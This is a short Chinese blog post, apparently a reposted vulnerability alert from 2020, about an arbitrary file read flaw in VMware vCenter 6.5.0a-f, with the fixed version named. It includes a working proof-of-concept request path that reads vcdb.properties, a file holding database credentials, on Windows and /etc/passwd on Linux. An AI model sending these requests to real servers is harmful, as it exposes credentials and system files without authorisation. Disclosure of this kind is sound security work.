美文网首页常见漏洞原理与修复建议
【漏洞预警】VMware vCenter任意文件读取漏洞

【漏洞预警】VMware vCenter任意文件读取漏洞

作者: migrate_ | 来源:发表于2020-10-15 16:21 被阅读0次

    仅供交流与学习使用,请勿用于非法用途

    • VMware vCenter特定版本存在任意文件读取漏洞,攻击者通过构造特定的请求,可以读取服务器上任意文件。

    影响范围

    • 已知影响版本
      VMware vCenter 6.5.0a-f
      安全版本
      VMware vCenter 6.5u1
    vmware-vCenter
    

    poc

    /eam/vib?id=C:\ProgramData\VMware\vCenterServer\cfg\vmware-vpx\vcdb.properties
    #linux
    /eam/vib?id=/etc/passwd
    

    相关文章

      网友评论

        本文标题:【漏洞预警】VMware vCenter任意文件读取漏洞

        本文链接:https://www.haomeiwen.com/subject/wblopktx.html